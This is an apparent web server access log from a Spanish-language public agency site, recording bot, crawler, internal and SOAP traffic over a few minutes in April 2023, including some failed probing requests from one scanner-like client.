172.22.2.4 - - [03/Apr/2023:04:12:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.66 - - [03/Apr/2023:04:14:30 -0500] "-" 408 -
172.22.2.4 - - [03/Apr/2023:04:13:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58653
216.245.221.92 - - [03/Apr/2023:04:15:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:04:17:52 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [03/Apr/2023:04:17:52 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
201.245.192.253 - - [03/Apr/2023:04:18:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [03/Apr/2023:04:18:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Apr/2023:04:20:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43156
201.245.192.253 - - [03/Apr/2023:04:20:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43157
216.245.221.92 - - [03/Apr/2023:04:20:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:04:19:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53104
172.22.2.4 - - [03/Apr/2023:04:22:35 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
201.245.192.253 - - [03/Apr/2023:04:23:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
34.91.50.11 - - [03/Apr/2023:04:24:07 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [03/Apr/2023:04:25:01 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
35.204.179.234 - - [03/Apr/2023:04:25:22 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
216.245.221.92 - - [03/Apr/2023:04:25:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:04:24:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:04:24:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53914
34.91.50.11 - - [03/Apr/2023:04:26:43 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
52.167.144.71 - - [03/Apr/2023:04:26:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3245.pdf HTTP/1.1" 200 435143
172.22.2.4 - - [03/Apr/2023:04:27:24 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [03/Apr/2023:04:27:35 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
74.125.210.215 - - [03/Apr/2023:04:27:55 -0500] "GET /Publicaciones/SSFFS-07827-2021.zip HTTP/1.1" 404 232
64.233.172.4 - - [03/Apr/2023:04:27:57 -0500] "GET /Publicaciones/SSFFS-16356-2021.zip HTTP/1.1" 404 232
201.245.192.253 - - [03/Apr/2023:04:28:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
34.147.120.241 - - [03/Apr/2023:04:28:42 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
181.132.36.239 - - [03/Apr/2023:04:29:46 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
181.132.36.239 - - [03/Apr/2023:04:29:46 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
181.132.36.239 - - [03/Apr/2023:04:29:46 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
34.141.138.26 - - [03/Apr/2023:04:30:15 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
201.245.192.253 - - [03/Apr/2023:04:30:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43156
201.245.192.253 - - [03/Apr/2023:04:30:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [03/Apr/2023:04:30:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43157
216.245.221.92 - - [03/Apr/2023:04:30:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:04:29:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:04:30:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53104
85.218.243.27 - - [03/Apr/2023:04:33:00 -0500] "\xa0" 400 226
85.218.243.27 - - [03/Apr/2023:04:33:01 -0500] "\xa0" 400 226
85.218.243.27 - - [03/Apr/2023:04:33:01 -0500] "\xa0" 400 226
85.218.243.27 - - [03/Apr/2023:04:33:01 -0500] "\xa0" 400 226
85.218.243.27 - - [03/Apr/2023:04:33:02 -0500] "\xa0" 400 226
85.218.243.27 - - [03/Apr/2023:04:33:02 -0500] "\xa0" 400 226
85.218.243.27 - - [03/Apr/2023:04:33:03 -0500] "\xa0" 400 226
85.218.243.27 - - [03/Apr/2023:04:33:03 -0500] "\xa0" 400 226
85.218.243.27 - - [03/Apr/2023:04:33:04 -0500] "\xa0" 400 226
85.218.243.27 - - [03/Apr/2023:04:33:04 -0500] "\xa0" 400 226
85.218.243.27 - - [03/Apr/2023:04:33:04 -0500] "\xa0" 400 226
179.43.177.242 - - [03/Apr/2023:04:33:15 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [03/Apr/2023:04:33:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
85.218.243.27 - - [03/Apr/2023:04:33:38 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
85.218.243.27 - - [03/Apr/2023:04:33:40 -0500] "GET /image/lgbg.jpg HTTP/1.1" 404 1018
85.218.243.27 - - [03/Apr/2023:04:33:43 -0500] "GET /skin/default_1/images/logo.png HTTP/1.1" 404 1018
85.218.243.27 - - [03/Apr/2023:04:33:45 -0500] "GET / HTTP/1.1" 200 319
85.218.243.27 - - [03/Apr/2023:04:33:48 -0500] "GET /login.rsp HTTP/1.1" 404 1018
34.91.36.176 - - [03/Apr/2023:04:34:00 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
173.252.107.2 - - [03/Apr/2023:04:34:34 -0500] "GET /images/semana-bosques-1_optimized.1.jpg HTTP/1.1" 200 102892
216.245.221.92 - - [03/Apr/2023:04:35:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:04:34:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
172.22.2.4 - - [03/Apr/2023:04:36:07 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1038
